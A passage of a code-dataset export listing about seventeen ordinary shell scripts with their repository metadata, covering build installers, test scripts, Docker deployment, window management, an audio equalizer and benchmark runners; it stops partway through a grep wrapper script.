blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
0e9f34ebf58e0a0e6e246d9a7f1bd19286483c30 | Shell | sshyran/git-timestamp | /tests/20-branch.sh | UTF-8 | 1,104 | 3.5625 | 4 | [
"MIT",
"CC-BY-3.0"
] | permissive | #!/bin/bash -e
# Test timestamping to branch
h="$PWD"
d=$1
shift
cd "$d"
export GNUPGHOME="$d/gnupg"
mkdir -p -m 700 "$GNUPGHOME"
git init
echo $RANDOM > 20-a.txt
git add 20-a.txt
git commit -m "Random change 20-$RANDOM"
# Change config
git config timestamp.branch gitta-timestamps
# Create branch with branch and server from config
$h/git-timestamp.py
# Check branch existence
if ! git branch | grep -q gitta-timestamps; then
echo "Branch gitta-timestamps does not exist" >&2
exit 1
fi
# Branch should be identical
if ! git diff --quiet gitta-timestamps; then
echo "Timestamp branch contents differ from master" >&2
exit 1
fi
# Yet another commit
echo $RANDOM >> 20-a.txt
git commit -m "Random commit 20-$RANDOM" -a
# Create a second branch node
$h/git-timestamp.py --server https://diversity.zeitgitter.net
# Branch should be identical
if ! git diff --quiet gitta-timestamps; then
echo "Timestamp branch contents differ from master" >&2
exit 1
fi
# Cryptographically verify all of them
git verify-commit gitta-timestamps gitta-timestamps^
# Clean up
git config --unset timestamp.branch
| true |
704637862a3300dc87643830d26230c69c376606 | Shell | jixiuf/dotfiles | /mac/bin/yabai-toggle-emacs | UTF-8 | 1,452 | 3.765625 | 4 | [] | no_license | #!/bin/bash
# Find a window with title containing "GNU/Emacs" but does not contains "*vterm*"
#
YABAI=/usr/local/bin/yabai
EMACSCLIENT=/usr/local/bin/emacsclient
JQ=/usr/local/bin/jq
# 选择所有
# emacs_wins=$($YABAI -m query --windows | $JQ -r '.[] | select(.title | test("^(?!.*vterm).*GNU/Emacs"))')
emacs_wins=$($YABAI -m query --windows | $JQ -r '.[] | select(.title | test("GNU/Emacs"))')
# emacs_wins=$($YABAI -m query --windows | $JQ -r '.[] | select(.title | test(".*\\*vterm\\*.*GNU/Emacs")) | .id')
wids=$(echo "$emacs_wins"|$JQ -r ".id")
# If found, hide the current emacs_wins
if [ -n "$wids" ]; then
focused=$(echo "$emacs_wins"|$JQ -r 'select(."has-focus"==true)|.id' )
if [ -n "$focused" ]; then # 如果当前聚焦的窗口是 emacs
# $YABAI -m window --close $id
# focus next or first window in current space
# $YABAI -m window --focus next || $YABAI -m window --focus first
$YABAI -m window --focus $(cat /tmp/yabai_prev_focus)
else
for id in ${wids[@]}; do
$YABAI -m window --focus $id
done
fi
else
# Otherwise, launch Emacs if it's not already running and focus it
$EMACSCLIENT -c -n &
sleep 0.3 # Wait for Emacs to start
emacs_wins=$($YABAI -m query --windows | $JQ -r '.[] | select(.title | test("GNU/Emacs"))')
wids=$(echo "$emacs_wins"|$JQ -r ".id")
for id in ${wids[@]}; do
$YABAI -m window --focus $id
done
fi
| true |
901b343deb68e82fe439bbf978cffb156f28cec1 | Shell | programming-langugages/lexical_analysis | /sr/install.sh | UTF-8 | 2,209 | 3.625 | 4 | [
"LicenseRef-scancode-public-domain"
] | permissive | #!/bin/sh
#
# Install SR.
. ./paths.sh
if [ -z "$SRCMD" -o -z "$SRLIB" ]; then
echo 'cannot install -- SRCMD or SRLIB is null' 1>&2
exit 1
fi
if [ ! -d "$SRCMD" -o ! -d "$SRLIB" ]; then
echo "cannot install -- $SRCMD or $SRLIB is not a directory" 1>&2
exit 1
fi
EXT3=`echo $MANEXT | tr 1 3`
EXT5=`echo $MANEXT | tr 1 5`
set -x
# commands
cp sr/sr $SRCMD; strip $SRCMD/sr
cp srl/srl $SRCMD; strip $SRCMD/srl
cp srm/srm $SRCMD; strip $SRCMD/srm
cp srprof/srprof $SRCMD; strip $SRCMD/srprof
cp srtex/srtex $SRCMD; strip $SRCMD/srtex
cp srlatex/srlatex $SRCMD; strip $SRCMD/srlatex
cp srgrind/srgrind $SRCMD
cp preproc/*2sr $SRCMD
# library components
cp sr.h $SRLIB
cp srmulti.h $SRLIB
cp rts/srlib.a $SRLIB
if [ -f /bin/ranlib -o -f /usr/bin/ranlib ]; then ranlib $SRLIB/srlib.a; fi
cp library/*.o $SRLIB
cp library/*.spec $SRLIB
cp library/*.impl $SRLIB
cp srmap $SRLIB
cp rts/srx $SRLIB; strip $SRLIB/srx
cp srlatex/srlatex.sty $SRLIB
cp preproc/*2sr.h $SRLIB
cp sr-mode.el $SRLIB
# man pages
if [ ! -z "$MAN1" -a -d "$MAN1" -a ! -z "$MANEXT" ]; then
cp man/sr.1 $MAN1/sr.$MANEXT
cp man/srl.1 $MAN1/srl.$MANEXT
cp man/srm.1 $MAN1/srm.$MANEXT
cp man/srprof.1 $MAN1/srprof.$MANEXT
cp man/srtex.1 $MAN1/srtex.$MANEXT
cp man/srlatex.1 $MAN1/srlatex.$MANEXT
cp man/srgrind.1 $MAN1/srgrind.$MANEXT
cp man/ccr2sr.1 $MAN1/ccr2sr.$MANEXT
cp man/m2sr.1 $MAN1/m2sr.$MANEXT
cp man/csp2sr.1 $MAN1/csp2sr.$MANEXT
else
echo 'not installing man pages for commands' 1>&2
fi
if [ ! -z "$MAN3" -a -d "$MAN3" -a ! -z "$EXT3" ]; then
cp man/sranimator.3 $MAN3/sranimator.$EXT3
cp man/srgetopt.3 $MAN3/srgetopt.$EXT3
cp man/srwin.3 $MAN3/srwin.$EXT3
else
echo 'not installing sranimator/srgetopt/srwin man pages' 1>&2
fi
if [ ! -z "$MAN5" -a -d "$MAN5" -a ! -z "$EXT5" ]; then
cp man/srmap.5 $MAN5/srmap.$EXT5
cp man/srtrace.5 $MAN5/srtrace.$EXT5
else
echo 'not installing srmap/srtrace man pages' 1>&2
fi
# we don't install srv anywhere because it's just a development tool.
exit 0
| true |
b36575ecf0273dbba49fcc5735574ca5d0444b72 | Shell | hans1/geeps | /sfs/usr/local/pequalizer/func | UTF-8 | 4,334 | 3.28125 | 3 | [] | no_license | #!/bin/bash
#pEqualizer
case "$1" in
-gui)
COUNT=1
until [ $COUNT = 11 ]; do
case $COUNT in #labels
1) FR="31Hz"; FREQ='01. 31 Hz';;
2) FR="63Hz"; FREQ='02. 63 Hz';;
3) FR="125Hz"; FREQ='03. 125 Hz';;
4) FR="250Hz"; FREQ='04. 250 Hz';;
5) FR="500Hz"; FREQ='05. 500 Hz';;
6) FR="1kHz"; FREQ='06. 1 kHz';;
7) FR="2kHz"; FREQ='07. 2 kHz';;
8) FR="4kHz"; FREQ='08. 4 kHz';;
9) FR="8kHz"; FREQ='09. 8 kHz';;
10) FR="16kHz"; FREQ='10. 16 kHz';;
esac
#<action>echo "'$VARIABLE' is now $'$VARIABLE'"</action> #this was for testing
SCALES=$SCALES'
<vbox width-request="28">
<vscale width-request="15" height-request="150" scale-min="0" scale-max="100" scale-step="1" value-pos="2" digits="0" inverted="true">
<input file>/tmp/eq/VAL'$COUNT'</input>
<variable>SLIDER'$COUNT'</variable>
<action>amixer -D equal sset '"'$FREQ'"' $SLIDER'$COUNT' >/dev/null 2>&1</action>
<item>"50 | 1"</item>
</vscale>
<text use-markup="true"><label>"<tt><small><small>'${FR}'</small></small></tt>"</label></text>
</vbox>'
COUNT=$(($COUNT+1))
done
;;
-preset)
cp -f $HOME/.pequalizer/preset/$PRESET /tmp/eq/valuesrc
. /tmp/eq/valuesrc
eval /usr/local/pequalizer/func -links #update images
COUNT=1
for VAL in '01._31_Hz' '02._63_Hz' '03._125_Hz' '04._250_Hz' '05._500_Hz' '06._1_kHz' '07._2_kHz' '08._4_kHz' '09._8_kHz' '10._16_kHz'; do
ACTVAL="`echo "$VAL"|tr '_' ' '`"
case $COUNT in #values
1)SETVAL="$VAL1";;
2)SETVAL="$VAL2";;
3)SETVAL="$VAL3";;
4)SETVAL="$VAL4";;
5)SETVAL="$VAL5";;
6)SETVAL="$VAL6";;
7)SETVAL="$VAL7";;
8)SETVAL="$VAL8";;
9)SETVAL="$VAL9";;
10)SETVAL="$VAL10";;
esac
#echo "amixer -D equal sset "$ACTVAL" "$SETVAL"" >> /root/debug #debug remove
amixer -D equal sset "$ACTVAL" "$SETVAL" >/dev/null 2>&1 #set mixer, suppress stdout and stderr
echo $SETVAL > /tmp/eq/VAL$COUNT
COUNT=$(($COUNT+1))
done
/usr/local/pequalizer/func -writeconfig
;;
-writeconfig)
echo "#pEqualizer config" > $HOME/.pequalizer/pequalizerrc
echo "export PRESET=$PRESET" >> $HOME/.pequalizer/pequalizerrc
;;
-getcurrent)
#get current values #could be a problem here if there is surround enabled
echo "#values" > /tmp/eq/valuesrc
CNT=1
for VAL in '01._31_Hz' '02._63_Hz' '03._125_Hz' '04._250_Hz' '05._500_Hz' '06._1_kHz' '07._2_kHz' '08._4_kHz' '09._8_kHz' '10._16_kHz'; do
ACTVAL="`echo "$VAL"|tr '_' ' '`"
PERCENT="`amixer -D equal sget "$ACTVAL" | grep -F "Left:" | cut -d ':' -f2 | cut -d' ' -f3`"
echo "VAL${CNT}=$PERCENT" >> /tmp/eq/valuesrc
echo "$PERCENT" > /tmp/eq/VAL${CNT}
CNT=$(($CNT+1))
done
#error check and fix
if [ ! -f $HOME/.alsaequal.bin ];then
gtkdialog-splash -close box -bg hotpink -text "An error occurred. When you close this box a window will open to attempt to fix the problem"
/usr/local/pequalizer/firstrun -fix && exit 1
fi
;;
-save)
SAVEFILE="`echo $PRESET | tr ' ' '_'`" #ensure it is only one word
if [ -s $HOME/.pequalizer/preset/$PRESET ]; then #already exist
export yesno_box='
<window title="pEqualizer" window_position="2" allow-grow="false">
<vbox>
<frame>
<pixmap icon_size="6"><input file stock="gtk-dialog-warning"></input></pixmap>
<text use-markup="true"><label>"<b>Preset <u>'$PRESET'</u> already exist.</b>"</label></text>
<text><label>Do you want to overwrite existing Preset?</label></text>
</frame>
<hbox><button no></button><button yes></button></hbox>
</vbox>
</window>'
I=$IFS; IFS=""
for STATEMENTS in $(gtkdialog4 -p yesno_box --center); do
eval $STATEMENTS
done
IFS=$I
[ $EXIT = No ] && exit
fi
/usr/local/pequalizer/func -getcurrent
cp /tmp/eq/valuesrc $HOME/.pequalizer/preset/$PRESET
;;
-delete)
export yesno_box='
<window title="pEqualizer" window_position="2" allow-grow="false">
<vbox>
<frame>
<pixmap icon_size="6"><input file stock="gtk-dialog-warning"></input></pixmap>
<text use-markup="true"><label>"<b>Do you really want to delete the preset <u>'$PRESET'</u>?</b>"</label></text>
</frame>
<hbox><button no></button><button yes></button></hbox>
</vbox>
</window>'
I=$IFS; IFS=""
for STATEMENTS in $(gtkdialog4 -p yesno_box --center); do
eval $STATEMENTS
done
IFS=$I
[ $EXIT = Yes ] && rm $HOME/.pequalizer/preset/$PRESET
;;
esac | true |
8ad12ea53b57b3416a2f175bfc243fbbcc5d07db | Shell | CodelyTV/dotly | /scripts/git/apply-gitignore | UTF-8 | 292 | 2.5625 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
set -euo pipefail
source "$DOTLY_PATH/scripts/core/_main.sh"
##? Remove tracked files from control version (not the file) that are in the gitignore
##?
##? Usage:
##? apply-gitignore
docs::parse "$@"
git ls-files --ignored --exclude-standard | xargs git rm --cached
| true |
fd4104881975a1f9d48d5e8769db0aff532582a5 | Shell | suyash-badnore/LinuxScripts | /Task2/task2.sh | UTF-8 | 235 | 3.578125 | 4 | [] | no_license | echo "Enter a String"
read Str
echo "Enter a character to find"
read c
ind=" "
for (( i=0; $i < ${#Str}; i++ ))
do
if [ ${Str:$i:1} == $c ]
then
echo "$c found at $(( i + 1 )) position"
fi
done
| true |
1cbcd6ac0260ce9a7e24816021573709526f5d6a | Shell | tosunkaya/mod_pagespeed | /pagespeed/system/system_tests/add_instrumentation.sh | UTF-8 | 924 | 2.6875 | 3 | [
"Apache-2.0"
] | permissive | start_test HTML add_instrumentation CDATA
$WGET -O $WGET_OUTPUT $TEST_ROOT/add_instrumentation.html\
?PageSpeedFilters=add_instrumentation
check [ $(grep -c "\&" $WGET_OUTPUT) = 0 ]
# In some servers PageSpeed runs before response headers are finalized, which
# means it has to assume the page is xhtml because the 'Content-Type' header
# might just not have been set yet. In others it runs after, and so it can
# trust what it sees in the headers. See RewriteDriver::MimeTypeXhtmlStatus().
if $HEADERS_FINALIZED; then
check [ $(grep -c '//<\!\[CDATA\[' $WGET_OUTPUT) = 0 ]
else
check [ $(grep -c '//<\!\[CDATA\[' $WGET_OUTPUT) = 1 ]
fi
start_test XHTML add_instrumentation also lacks '&' and contains CDATA
$WGET -O $WGET_OUTPUT $TEST_ROOT/add_instrumentation.xhtml\
?PageSpeedFilters=add_instrumentation
check [ $(grep -c "\&" $WGET_OUTPUT) = 0 ]
check [ $(grep -c '//<\!\[CDATA\[' $WGET_OUTPUT) = 1 ]
| true |
75b689ee70b270f06d19a1b41ee19f7eccf300b1 | Shell | liveid/com.x-wrt | /net/mwan3plus/files/usr/share/mwan3/mwan3-reload.sh | UTF-8 | 273 | 2.71875 | 3 | [] | no_license | #!/bin/sh
. /lib/functions.sh
. /lib/mwan3/common.sh
. /lib/mwan3/mwan3.sh
mwan3_lock "command" "mwan3"
config_load mwan3
config_get_bool enabled globals 'enabled' '0'
mwan3_unlock "command" "mwan3"
[ "${enabled}" != 1 ] && exit 0
/etc/init.d/mwan3 restart &
exit 0
| true |
a3e9106eebd67fbd63cb3455f033097af51a3df3 | Shell | bhanu-reddy/shell-scripts | /readinput | UTF-8 | 187 | 3 | 3 | [] | no_license | #!/bin/bash
# read the input from the user and display it on the screen.
echo " what is your first name..?"
read a
echo
echo " what is your last name....?"
read b
echo
echo hello $a $b
| true |
cf9e9e6596a6493ba2c6603605ecfc7620349e32 | Shell | esno/gentoo-overlay | /sys-kernel/mkinitram/files/mkinitram.sh | UTF-8 | 2,193 | 3.046875 | 3 | [
"MIT"
] | permissive | #!/bin/sh
TMPDIR=$(mktemp -d)
# create directories
mkdir \
$TMPDIR/bin \
$TMPDIR/boot \
$TMPDIR/dev \
$TMPDIR/etc \
$TMPDIR/lib \
$TMPDIR/lib/modules \
$TMPDIR/newroot \
$TMPDIR/proc \
$TMPDIR/root \
$TMPDIR/run \
$TMPDIR/sys \
$TMPDIR/tmp \
$TMPDIR/usr \
$TMPDIR/usr/lib \
$TMPDIR/var \
$TMPDIR/var/log \
$TMPDIR/var/run \
ln -s lib $TMPDIR/lib64
ln -s lib $TMPDIR/usr/lib64
# create device nodes
mknod -m 600 $TMPDIR/dev/console c 5 1
mknod -m 666 $TMPDIR/dev/urandom c 1 9
mknod -m 666 $TMPDIR/dev/random c 1 8
mknod -m 640 $TMPDIR/dev/mem c 1 1
mknod -m 666 $TMPDIR/dev/null c 1 3
mknod -m 666 $TMPDIR/dev/tty c 5 0
mknod -m 666 $TMPDIR/dev/zero c 1 5
mknod -m 640 $TMPDIR/dev/tty1 c 4 1
###
#todo: reference files in rootfs and ldd -v all depending libs
###
# copy binariies
BINARIES="/bin/busybox /sbin/cryptsetup /sbin/lvm"
for b in $BINARIES; do
cp $b $TMPDIR/bin
for l in $(ldd $b | sed -nre 's,.* (/.*lib.*/.*.so.*) .*,\1,p' -e 's,.*(/lib.*/ld.*.so.*) .*,\1,p'); do
cp $l $TMPDIR/lib
done
done
cp /usr/share/mkinitram/init.sh $TMPDIR/init
# create symlinks
ln -s busybox $TMPDIR/bin/awk
ln -s busybox $TMPDIR/bin/cat
ln -s busybox $TMPDIR/bin/echo
ln -s busybox $TMPDIR/bin/egrep
ln -s busybox $TMPDIR/bin/grep
ln -s busybox $TMPDIR/bin/hexdump
ln -s busybox $TMPDIR/bin/hostname
ln -s busybox $TMPDIR/bin/ifconfig
ln -s busybox $TMPDIR/bin/kill
ln -s busybox $TMPDIR/bin/ls
ln -s busybox $TMPDIR/bin/mount
ln -s busybox $TMPDIR/bin/sh
ln -s busybox $TMPDIR/bin/test
ln -s busybox $TMPDIR/bin/umount
ln -s lvm $TMPDIR/bin/vgscan
ln -s lvm $TMPDIR/bin/vgchange
ln -s lvm $TMPDIR/bin/vgmknodes
LINUXVERSION=$(ls -t /lib/modules/ | head -n 1)
cp -rf /lib/firmware $TMPDIR/lib
cp -rf /lib/modules/$LINUXVERSION $TMPDIR/lib/modules
# create config
echo "root:x:0:0:root:/root:/bin/sh" > $TMPDIR/etc/passwd
echo "root:x:0:root" > $TMPDIR/etc/group
echo "root:!:10770:0:::::" > $TMPDIR/etc/shadow
cp /etc/initram.cfg $TMPDIR/etc/initram.cfg
chmod 744 $TMPDIR/init
# create initramfs
TMPCD=$(pwd)
cd $TMPDIR && find . -print0 | cpio --null -ov --format=newc | gzip -9 > $TMPCD/initram.gz && cd $TMPCD
rm -rf $TMPDIR
| true |
e392ed4acaa503ec6707735287e2121eb8a2cd7e | Shell | fanchangyong/hello_docker | /clean_containers.sh | UTF-8 | 196 | 3.3125 | 3 | [] | no_license | #!/bin/sh
CONTAINERS=`sudo docker ps -aq`
if [ ! -z "$CONTAINERS" ] ; then
echo "Stopping containers"
sudo docker stop $CONTAINERS
echo "Deleting containers"
sudo docker rm $CONTAINERS
fi
| true |
e6fe64ef3cef1170e5dac38f214c4d6225c3a88e | Shell | jrenelg/proto-merge | /proto-merge.sh | UTF-8 | 5,707 | 4.03125 | 4 | [] | no_license | #!/bin/bash
# Shell script for merging a set of protobuf files
# Usage: $0 [*.proto path with the api definition]
# $0 basedir/././file.proto
# EXIT CODES
# 0 - Success
# 97 - Nothing to merge
# 98 - Import file don't exist
# 99 - File don't exist or isn't a proto
FULL_NAME=$0
PRM_PROTOPATH=$1
EXIT_CODE=0
VERBOSE=false
DEEP_LEVEL=4
PID="$$" #Process PID in order to indentify each execution
BASE_DIR=$(dirname $FULL_NAME)
BASE_NAME=$(basename $FULL_NAME | sed "s/.sh//")
MAIN_PROTO="${BASE_DIR}/${PRM_PROTOPATH}"
if [ ! -f $MAIN_PROTO ] || [[ $MAIN_PROTO != *.proto ]]; then
echo "File don't exist or isn't a proto in base dir $MAIN_PROTO"
exit 99
fi
##<<<<<< Functions Section Start >>>>>>>
# Function for loggin in a log fine setted in the same path
logger () {
local LOG_LEVEL=$1
shift
local MSG=$@
local TIMESTAMP=$(/bin/date +"%Y-%m-%d %T")
if [ $LOG_LEVEL = 'ERROR' ] || $VERBOSE ; then
echo "${TIMESTAMP} ${FULL_NAME} ${LOG_LEVEL} ${PID}: ${MSG}" >> $LOG_FILE
fi
}
importProto() {
local PROTO_LIST=("$@")
local RESULT=()
local INDX=0
for PROTO in "${PROTO_LIST[@]}"; do
local PROTO_PATH=${PROTO#*|};
logger INFO "Importing $PROTO_PATH"
OIFS=$IFS
IFS=
while read LINE || [ -n "$LINE" ]; do
if [[ $LINE =~ ^\s*import.*$BASE_PACKAGE.*$ ]]; then
local PATH=${LINE#*\"};
PATH=${PATH%\"*};
local ABSOLUTE_PATH="${BASE_DIR}/${PATH}"
if [ -f $ABSOLUTE_PATH ]; then
local DIR="${PATH%/*}/"
RESULT[$INDX]="${DIR//\//.}|$PATH"
let INDX+=1
else
logger ERROR "Proto file don't exist in the base package $BASE_PACKAGE: $ABSOLUTE_PATH"
EXIT_CODE=98
fi
else
if [[ $LINE =~ ^\s*import.*$ ]]; then
echo $LINE >> $IMPORT_SECTION
else
if ! [[ "$LINE" =~ ^(syntax|package|option) ]]; then
for PACKAGE in "${RESULT[@]}"; do
PACKAGE=${PACKAGE%|*};
LINE=("${LINE/$PACKAGE/}")
done
LINE=("${LINE// \[\(validate.*/;}")
echo $LINE >> $PRINTER
fi
fi
fi
done < $PROTO_PATH
IFS=$OIFS
logger INFO "Imported $PROTO_PATH"
done
echo "${RESULT[@]}"
return $EXIT_CODE
}
##<<<<<< Functions Section End >>>>>>>
BASE_PACKAGE=${PRM_PROTOPATH%%/*}
BASE_PROTO_NAME=$(basename $MAIN_PROTO | sed "s/.proto//")
COMBINED_PROTO="${BASE_PROTO_NAME}_merged.proto"
IMPORT_SECTION="${BASE_PROTO_NAME}_import.tmp"
HEADER_SECTION="${BASE_PROTO_NAME}_header.tmp"
BODY_SECTION="${BASE_PROTO_NAME}_body.tmp"
LOG_FILE="${BASE_DIR}/${BASE_NAME}.log"
rm -f $COMBINED_PROTO
rm -f *.tmp
IMPORT_PROTO_LIST=()
IMPORT_INDX=0
PRINTER=$HEADER_SECTION
logger INFO "Starting merge of $MAIN_PROTO"
#Loop main proto file
OIFS=$IFS
IFS=
while read LINE || [ -n "$LINE" ]; do
#If the line is an import in the base dir
if [[ $LINE =~ ^\s*import.*$BASE_PACKAGE.*$ ]]; then
IMPORT_PATH=$(echo "$LINE" | cut -d'"' -f 2)
IMPORT_ABSOLUTE_PATH="${BASE_DIR}/${IMPORT_PATH}"
if [ -f $IMPORT_ABSOLUTE_PATH ]; then
#If the proto file exist include it in the next import iteration
NOFILE_PATH="${IMPORT_PATH%/*}/"
IMPORT_PROTO_LIST[$IMPORT_INDX]="${NOFILE_PATH//\//.}|$IMPORT_ABSOLUTE_PATH"
let IMPORT_INDX+=1
if [ ! -f $BODY_SECTION ]; then
PRINTER=$BODY_SECTION
fi
else
logger ERROR "Proto file don't exist in the base package $BASE_PACKAGE: $ABSOLUTE_PATH"
EXIT_CODE=98
fi
else
#If is an external import
if [[ $LINE =~ ^\s*import.*$ ]]; then
echo $LINE >> $IMPORT_SECTION
else
#If isnt an import line check if has any import package refrence
for PACKAGE in "${IMPORT_PROTO_LIST[@]}"; do
PACKAGE=${PACKAGE%|*};
LINE=("${LINE/$PACKAGE/}")
done
#Remove validations
LINE=("${LINE/^\s\[\(validate\.\w+\)\S+\s\=\s\S+\]/}")
echo $LINE >> $PRINTER
fi
fi
done < $MAIN_PROTO
IFS=$OIFS
if [ -n "$IMPORT_PROTO_LIST" ]; then
CURRENT_LEVEL="${IMPORT_PROTO_LIST[@]}"
for ((i=1;i<=$DEEP_LEVEL;i++));
do
logger INFO "LEVEL $i Start: {${CURRENT_LEVEL[@]}}"
NEXT_LEVEL=($(importProto ${CURRENT_LEVEL[@]}))
EXIT_CODE=$?
logger INFO "LEVEL $i End: exit_code=$EXIT_CODE result={${NEXT_LEVEL[@]}}"
if [ ! -n "$NEXT_LEVEL" ]; then
logger INFO "There aren't coming imports to process"
break
fi
CURRENT_LEVEL="${NEXT_LEVEL[@]}"
done
#Remove validation proto import from section file
IMPORT_SECTION_FILTER="${BASE_PROTO_NAME}_import_filter.tmp"
echo $(sed '/.*validate.*proto.*/d' $IMPORT_SECTION) >> $IMPORT_SECTION_FILTER
#Get uniq imports
IMPORT_SECTION_UNIQ="${BASE_PROTO_NAME}_import_uniq.tmp"
echo $(sort $IMPORT_SECTION_FILTER | uniq) >> $IMPORT_SECTION_UNIQ
#Merging proto sections
cat $HEADER_SECTION $IMPORT_SECTION_UNIQ $BODY_SECTION > $COMBINED_PROTO
else
echo "Nothing to merge"
EXIT_CODE=97
fi
rm *.tmp
logger INFO "End merge with exit code $EXIT_CODE of $MAIN_PROTO"
if [[ $EXIT_CODE -ne 0 ]]; then
echo "Proto files merged with errors, you can find more infomation in $LOG_FILE";
fi
exit $EXIT_CODE
| true |
ac443b06e10c67a20462b0076820909b04d8153d | Shell | adamvnz/ArchLabs | /installation/personal/750-install-personal-settings-terminix-v1.sh | UTF-8 | 1,093 | 3 | 3 | [] | no_license | #!/bin/bash
set -e
##################################################################################################################
# Written to be used on 64 bits computers
# Author : Erik Dubois
# Website : http://www.erikdubois.be
##################################################################################################################
##################################################################################################################
#
# DO NOT JUST RUN THIS. EXAMINE AND JUDGE. RUN AT YOUR OWN RISK.
#
##################################################################################################################
# there is no terminix folder - all in dconf
#[ -d $HOME"/.config/terminix" ] || mkdir -p $HOME"/.config/terminix"
# you can use it to store personal settings/sessions
cd settings/terminix/
sh load-terminix-settings.sh
echo "################################################################"
echo "######### terminix settings have been uploaded ########"
echo "################################################################"
| true |
f76d614580b6a025c345a5d4d5da403f7a1aa54f | Shell | tuyen81/self_learning | /shell/running_package/testcases/coreutils/cat.sh | UTF-8 | 400 | 2.875 | 3 | [] | no_license | #!/bin/bash
#==============================================================================
# DESCRIPTION: Testing for cat command.
# The cat command is used to print a file on the standard output.
#==============================================================================
cat ${data_dir}/sample.txt > ${log_file} 2>&1
diff ${data_dir}/sample.txt ${log_file}
assert_passed $? 0
| true |
199f6b1d4ff70185b23072a34cefff6bb589991d | Shell | lzecca78/dotfiles | /scripts/setup-git.sh | UTF-8 | 748 | 3.546875 | 4 | [] | no_license | #!/bin/bash
echo "insert the name you want to visualize the commits in GIT"
read name
echo "insert the email you want to associate to your account in your GIT commit"
read email
echo "git config --global user.name $name ; git config --global user.email $email , is this correct ? (y/n)"
read answer
if [ $answer = 'y' ]
then
git config --global user.name "$name"
git config --global user.email "$email"
git config --global color.ui auto
git config --global core.editor vim
git config color.status.header white
git config color.status.added green
git config color.status.changed red
git config color.status.untracked ul
else
echo "your answer was different from (y):$answer, leaving, bye..."
exit 1
fi
| true |
0f3194a7d5db225e8af1484ca3b8a86b3f561068 | Shell | danielpcampagna/4git | /install.sh | UTF-8 | 269 | 3.40625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
for path in commands/4git*; do
file=$(echo "$path" | cut -c10-)
echo "installing $file..."
sudo cp $path /usr/bin/$file
sudo chmod +x /usr/bin/$file;
done
echo
echo "Well done!"
echo "installed commands:"
find /usr/bin/ | grep 4git
exit 0; | true |
05312c78112835ed8e5ed19117ddc64e0bb14fb9 | Shell | sysadmin-exe/devops_lab_public | /deploy.sh | UTF-8 | 995 | 3.359375 | 3 | [] | no_license | #!/bin/bash
#replace ${projectname} with your project name eg paycentre
#replabe ${port} with the ports exposed on your project eg 8180
if [ ! "$(docker ps -q -f name=www)" ]
then
echo "************************************* No instance of project Running Currently *******************************"
if [ "$(docker ps -aq -f name=www)" ]
then
echo "************************************* Removing Previous non-running Container *******************************"
docker rm www
fi
else
echo "************************************* Killing Previous Container *******************************"
docker kill www
echo "************************************* Removing Previous Container *******************************"
docker rm www
fi
echo "************************************* Staring the new Container *******************************"
docker pull sysadminexe/www
docker run -d -p 8080:80 --name www sysadminexe/www | true |
f2d8e3070bae48224b41529b52f65a4d52561c47 | Shell | NicoK/flink-perf | /scripts/runStorm.sh | UTF-8 | 2,447 | 3.390625 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
RUNNAME=$1
STORM_JOB_TARGET=/home/robert/flink-perf/storm-jobs/target
LOG="run-log-storm-$1"
REPART=1
DELAY=1
#sleep for 1 ms every second record
SLEEP_FREQ=2
FT=""
export HADOOP_CONF_DIR=/etc/hadoop/conf
JOB_ID=""
start_job() {
JOB_ID=`cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1`
echo -n "$1;$JOB_ID;$REPART;$FT;" >> $LOG
echo "Starting job on Storm with $1 workers, repart $REPART"
PARA=`echo $1*4 | bc`
# experiments.Throughput
storm jar $STORM_JOB_TARGET/storm-jobs-0.1-SNAPSHOT.jar experiments.ThroughputHostsTracking --delay $DELAY $FT --sleepFreq $SLEEP_FREQ --repartitions $REPART --para $1 --name $JOB_ID --payload 12 --logfreq 10000 --sourceParallelism $PARA --sinkParallelism $PARA --latencyFreq 2000 | tee lastJobOutput
}
append() {
echo -n "$1;" >> $LOG
}
duration() {
sleep $1
append "$1"
}
kill_on_storm() {
storm kill throughput-$JOB_ID
sleep 30
}
FILENAME=""
getLogsFor() {
#cd /var/log/storm
#FILENAME=`ls -l | grep $JOB_ID | head -n1 | rev | cut -d" " -f1 | rev`
#cd -
for i in $(seq 0 39);
do
echo "Getting log file from machine $i"
scp "robert-streaming-w-$i":/var/log/storm/*$JOB_ID* logs/robert-streaming-w-$i-$JOB_ID
done
cat logs/robert-streaming-w-*-$JOB_ID > logs/aggregated-$JOB_ID
#echo $FILENAME
}
analyzeLogs() {
java -cp /home/robert/flink-perf/perf-common/target/perf-common-0.1-SNAPSHOT-jar-with-dependencies.jar com.github.projectflink.common.AnalyzeTool logs/aggregated-$JOB_ID >> $LOG
}
function experiment() {
start_job $1
duration $2
kill_on_storm
getLogsFor
analyzeLogs
}
echo "machines;job-id;duration-sec;lat-mean;lat-median;lat-90percentile;lat-95percentile;lat-99percentile;throughput-mean;throughput-max;latencies;throughputs" >> $LOG
REPART=4
DURATION=180
#experiment 30 $DURATION
SLEEP_FREQ=1
FT=" --ft "
experiment 30 $DURATION
exit
DURATION=900
#experiment 10 $DURATION
#experiment 10 $DURATION
#experiment 10 $DURATION
#experiment 20 $DURATION
#experiment 20 $DURATION
#experiment 20 $DURATION
#experiment 30 $DURATION
#experiment 30 $DURATION
#experiment 30 $DURATION
REPART=2
experiment 30 $DURATION
experiment 30 $DURATION
experiment 30 $DURATION
REPART=4
experiment 30 $DURATION
experiment 30 $DURATION
experiment 30 $DURATION
FT=" --ft "
REPART=2
experiment 30 $DURATION
experiment 30 $DURATION
experiment 30 $DURATION
REPART=4
experiment 30 $DURATION
experiment 30 $DURATION
experiment 30 $DURATION
| true |
07e25aa2491f5909125e38b96904576d7018d89a | Shell | dford0009/references | /course-full (BASH SCRIPTING)/module_12/lesson_12.03/protected/code/src/exit-codes/multigrep.bash | UTF-8 | 392 | 3.796875 | 4 | [] | no_license | #!/usr/bin/env bash
set -o errexit -o noclobber -o nounset -o pipefail
shopt -s failglob
if (( "$#" == 0 ))
then
exit 1
fi
pipeline_commands=()
for pattern
do
pipeline_commands+=("$(printf 'grep --regexp=%q' "$pattern")")
done
